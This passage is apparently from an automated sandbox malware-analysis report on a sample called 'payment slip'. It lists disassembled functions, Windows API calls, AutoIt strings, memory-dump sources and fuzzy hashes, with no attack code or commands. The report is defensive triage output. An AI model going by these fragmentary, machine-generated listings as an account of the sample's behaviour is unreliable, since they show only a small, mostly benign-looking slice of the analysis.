                                        • Instruction Fuzzy Hash: E922B2B0E0460ADFDF25CF64C881AEEB3F5FF44301F108529E81AA7291EB79A955CB54
                                        Function 000391C0 Relevance: .5, Instructions: 475COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a280e57caaba0bccee4e9a78a2a3e8acccf8409a373a5168c43425121b38f611
                                        • Instruction ID: a39dfa5cd2237fd5ecc5c87f5bc7822f99e5edf4a54e8ecfa9a81c4a2e9cd014
                                        • Opcode Fuzzy Hash: a280e57caaba0bccee4e9a78a2a3e8acccf8409a373a5168c43425121b38f611
                                        • Instruction Fuzzy Hash: 5202D8B0E00106EFDB15DF54D881AAEB7B5FF48300F11C169E81A9B291EB75EE11CB95
                                        Function 00051C77 Relevance: .3, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction ID: e086eb4db394a85e079ec0a0296ec660d565ddfeca7436132be83485c0612334
                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction Fuzzy Hash: 7B9175321080A34ADB69463A85356BFFFF15B923A371A079DDCF2CA1C1EE20895CD620
                                        Function 000519B0 Relevance: .2, Instructions: 240COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction ID: 3c22fd8e610a89ff0294d01a078be1ec849a3850666fc59a280ee7f0b25379bd
                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction Fuzzy Hash: 949159722090A349EB6E427A85741BFFFE15B923A371A079DD8F2CA1C1FE14C55CD620
                                        Function 00057A4A Relevance: .2, Instructions: 237COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8e4357ab3c8a57c981b1d30111489f98149e4bb5e88608590cdeaadeb2408fb
                                        • Instruction ID: 1c239922c3d26797c019bb7979dd0dd58b6d849e8d3d07f815208a87b5e22845
                                        • Opcode Fuzzy Hash: a8e4357ab3c8a57c981b1d30111489f98149e4bb5e88608590cdeaadeb2408fb
                                        • Instruction Fuzzy Hash: C661577160870956FAB49928B899BFF23D8DF81303F144919ED4EDB282DB119E4EF316
                                        Function 00057CA7 Relevance: .2, Instructions: 237COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92faed252fab2b1ed0da5c4990537c3eb28ffdf3ffc8083932d3c14b94231105
                                        • Instruction ID: 0974ede9832ee465892a7d7a63a0bbe8f64f14fc9af6c71efb813052626904df
                                        • Opcode Fuzzy Hash: 92faed252fab2b1ed0da5c4990537c3eb28ffdf3ffc8083932d3c14b94231105
                                        • Instruction Fuzzy Hash: BB615A7120870956DEB84928785ABBF23F8DF45703F104959EC4BDB282EA129D4EF365
                                        Function 00051706 Relevance: .2, Instructions: 232COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction ID: 7da379901184674684e3663439507fe453b54dbc7ea72cad7aa46965708e76ad
                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction Fuzzy Hash: BC81547250D0A309DBA9423D85346BFFFE15F923A371A079DD8F2CA1C1EE24995CD620
                                        Function 000A2046 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54e8de44450efe65827671db54f4fe2cbb08945deb3b9e9e29b44440e2d0001e
                                        • Instruction ID: 09edbdb4bc4fdd216f7a3e9914ef2cb1cb304785a4d519dae52ca4d7d8ee5d11
                                        • Opcode Fuzzy Hash: 54e8de44450efe65827671db54f4fe2cbb08945deb3b9e9e29b44440e2d0001e
                                        • Instruction Fuzzy Hash: DF21B7326206118BD728CF79C823A7E73E5AB54310F15862EE4A7C37D1DE7AA944CB80
                                        Function 000B2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 000B2B30
                                        • DeleteObject.GDI32(00000000), ref: 000B2B43
                                        • DestroyWindow.USER32 ref: 000B2B52
                                        • GetDesktopWindow.USER32 ref: 000B2B6D
                                        • GetWindowRect.USER32(00000000), ref: 000B2B74
                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 000B2CA3
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 000B2CB1
                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2CF8
                                        • GetClientRect.USER32(00000000,?), ref: 000B2D04
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000B2D40
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D62
                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D75
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D80
                                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D89
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2D98
                                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DA1
                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DA8
                                        • GlobalFree.KERNEL32(00000000), ref: 000B2DB3
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2DC5
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,000CFC38,00000000), ref: 000B2DDB
                                        • GlobalFree.KERNEL32(00000000), ref: 000B2DEB
                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 000B2E11
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 000B2E30
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B2E52
                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000B303F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                        • String ID: $AutoIt v3$DISPLAY$static
                                        • API String ID: 2211948467-2373415609
                                        • Opcode ID: 6f03a7541cfb51a32d8dddfc9eb7aa816545a3ebfa8517acd5a50591024d4f3b
                                        • Instruction ID: e50d27151ea63e1c06794060a67721acb4deccd484197104a7db99f0f8b360f1
                                        • Opcode Fuzzy Hash: 6f03a7541cfb51a32d8dddfc9eb7aa816545a3ebfa8517acd5a50591024d4f3b
                                        • Instruction Fuzzy Hash: AA025C71900209EFEB14DF64CD89EAE7BB9FF49314F148158F919AB2A1CB74AD41CB60
                                        Function 000C70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 000C712F
                                        • GetSysColorBrush.USER32(0000000F), ref: 000C7160
                                        • GetSysColor.USER32(0000000F), ref: 000C716C
                                        • SetBkColor.GDI32(?,000000FF), ref: 000C7186
                                        • SelectObject.GDI32(?,?), ref: 000C7195
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 000C71C0
                                        • GetSysColor.USER32(00000010), ref: 000C71C8
                                        • CreateSolidBrush.GDI32(00000000), ref: 000C71CF
                                        • FrameRect.USER32(?,?,00000000), ref: 000C71DE
                                        • DeleteObject.GDI32(00000000), ref: 000C71E5
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 000C7230
                                        • FillRect.USER32(?,?,?), ref: 000C7262
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C7284
                                          • Part of subcall function 000C73E8: GetSysColor.USER32(00000012), ref: 000C7421
                                          • Part of subcall function 000C73E8: SetTextColor.GDI32(?,?), ref: 000C7425
                                          • Part of subcall function 000C73E8: GetSysColorBrush.USER32(0000000F), ref: 000C743B
                                          • Part of subcall function 000C73E8: GetSysColor.USER32(0000000F), ref: 000C7446
                                          • Part of subcall function 000C73E8: GetSysColor.USER32(00000011), ref: 000C7463
                                          • Part of subcall function 000C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000C7471
                                          • Part of subcall function 000C73E8: SelectObject.GDI32(?,00000000), ref: 000C7482
                                          • Part of subcall function 000C73E8: SetBkColor.GDI32(?,00000000), ref: 000C748B
                                          • Part of subcall function 000C73E8: SelectObject.GDI32(?,?), ref: 000C7498
                                          • Part of subcall function 000C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 000C74B7
                                          • Part of subcall function 000C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000C74CE
                                          • Part of subcall function 000C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 000C74DB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                        • String ID:
                                        • API String ID: 4124339563-0
                                        • Opcode ID: 7c12c8b2ddd1fcc6a973394f0df1167071949a77c614c282a7732533121f7ab5
                                        • Instruction ID: 72a56fa44a5af90ef38c3fd14f52cd8f3825bc62f417626113e36e6e2604d048
                                        • Opcode Fuzzy Hash: 7c12c8b2ddd1fcc6a973394f0df1167071949a77c614c282a7732533121f7ab5
                                        • Instruction Fuzzy Hash: 19A19D72008701AFEB109F64DC48E6F7BE9FB89320F140A19F9AA961E1D778E944CF51
                                        Function 00048D85 Relevance: 49.5, APIs: 26, Strings: 2, Instructions: 480windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 00048E14
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00086AC5
                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00086AFE
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00086F43
                                          • Part of subcall function 00048F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00048BE8,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048FC5
                                        • SendMessageW.USER32(?,00001053), ref: 00086F7F
                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00086F96
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00086FAC
                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 00086FB7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                        • String ID: U$0
                                        • API String ID: 2760611726-4222668077
                                        • Opcode ID: 6118c3b57d92d2c804a9f5829226d1140804a8a49659f1bb36232c286d476e96
                                        • Instruction ID: 08016a8475fab9aaf18e2b5fd2bd5019e1f5f69a35562e07aedb61c9b5f7cd68
                                        • Opcode Fuzzy Hash: 6118c3b57d92d2c804a9f5829226d1140804a8a49659f1bb36232c286d476e96
                                        • Instruction Fuzzy Hash: 8712BC70600201EFDB65EF14C848FAAB7E1FB44304F158469F4C98B662CB36EC92CB55
                                        Function 000B2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 000B273E
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000B286A
                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 000B28A9
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 000B28B9
                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 000B2900
                                        • GetClientRect.USER32(00000000,?), ref: 000B290C
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 000B2955
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000B2964
                                        • GetStockObject.GDI32(00000011), ref: 000B2974
                                        • SelectObject.GDI32(00000000,00000000), ref: 000B2978
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 000B2988
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000B2991
                                        • DeleteDC.GDI32(00000000), ref: 000B299A
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000B29C6
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 000B29DD
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 000B2A1D
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000B2A31
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 000B2A42
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 000B2A77
                                        • GetStockObject.GDI32(00000011), ref: 000B2A82
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000B2A8D
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 000B2A97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-517079104
                                        • Opcode ID: 30db2170360cbf4af837c454e2add321c856227aa6cb118675cfc1c767c2db4a
                                        • Instruction ID: 039f358524aa97314e5f24d19c7a8972b06eefe5678b96bca3595940f75304f1
                                        • Opcode Fuzzy Hash: 30db2170360cbf4af837c454e2add321c856227aa6cb118675cfc1c767c2db4a
                                        • Instruction Fuzzy Hash: F0B14D71A40215BFEB14DFA8CC49FAE7BA9FB08710F004114FA15EB691DBB4AD40CB94
                                        Function 000A4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000A4AED
                                        • GetDriveTypeW.KERNEL32(?,000CCB68,?,\\.\,000CCC08), ref: 000A4BCA
                                        • SetErrorMode.KERNEL32(00000000,000CCB68,?,\\.\,000CCC08), ref: 000A4D36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: 8b68adb0088009ce437abaca189d7e5eb88377eb48b2e70b010199bcdec8ab02
                                        • Instruction ID: 10aaf39bc2af0a52dc51ec76496237a865259de0f69f58e2db9fd165dcb0ac8f
                                        • Opcode Fuzzy Hash: 8b68adb0088009ce437abaca189d7e5eb88377eb48b2e70b010199bcdec8ab02
                                        • Instruction Fuzzy Hash: F8613738701209DBCB54DFA4C982DBC77B1EB86310B248015FA0AAFA52CBF6DD45EB51
                                        Function 000C73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 000C7421
                                        • SetTextColor.GDI32(?,?), ref: 000C7425
                                        • GetSysColorBrush.USER32(0000000F), ref: 000C743B
                                        • GetSysColor.USER32(0000000F), ref: 000C7446
                                        • CreateSolidBrush.GDI32(?), ref: 000C744B
                                        • GetSysColor.USER32(00000011), ref: 000C7463
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 000C7471
                                        • SelectObject.GDI32(?,00000000), ref: 000C7482
                                        • SetBkColor.GDI32(?,00000000), ref: 000C748B
                                        • SelectObject.GDI32(?,?), ref: 000C7498
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 000C74B7
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000C74CE
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 000C74DB
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C752A
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000C7554
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 000C7572
                                        • DrawFocusRect.USER32(?,?), ref: 000C757D
                                        • GetSysColor.USER32(00000011), ref: 000C758E
                                        • SetTextColor.GDI32(?,00000000), ref: 000C7596
                                        • DrawTextW.USER32(?,000C70F5,000000FF,?,00000000), ref: 000C75A8
                                        • SelectObject.GDI32(?,?), ref: 000C75BF
                                        • DeleteObject.GDI32(?), ref: 000C75CA
                                        • SelectObject.GDI32(?,?), ref: 000C75D0
                                        • DeleteObject.GDI32(?), ref: 000C75D5
                                        • SetTextColor.GDI32(?,?), ref: 000C75DB
                                        • SetBkColor.GDI32(?,?), ref: 000C75E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1996641542-0
                                        • Opcode ID: 5c63a9413e3c2f695e97e7cc73928f55a474da9991355c495c572e6488a0af57
                                        • Instruction ID: 89af01db6535885ef6a9f1e38068d1232e0dfc0a84c58ae744231a97ce497f02
                                        • Opcode Fuzzy Hash: 5c63a9413e3c2f695e97e7cc73928f55a474da9991355c495c572e6488a0af57
                                        • Instruction Fuzzy Hash: 00615C72900218AFEF119FA4DC49EEEBFB9EB09320F154115FA19AB2A1D7749940CF90
                                        Function 000C0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 000C1128
                                        • GetDesktopWindow.USER32 ref: 000C113D
                                        • GetWindowRect.USER32(00000000), ref: 000C1144
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C1199
                                        • DestroyWindow.USER32(?), ref: 000C11B9
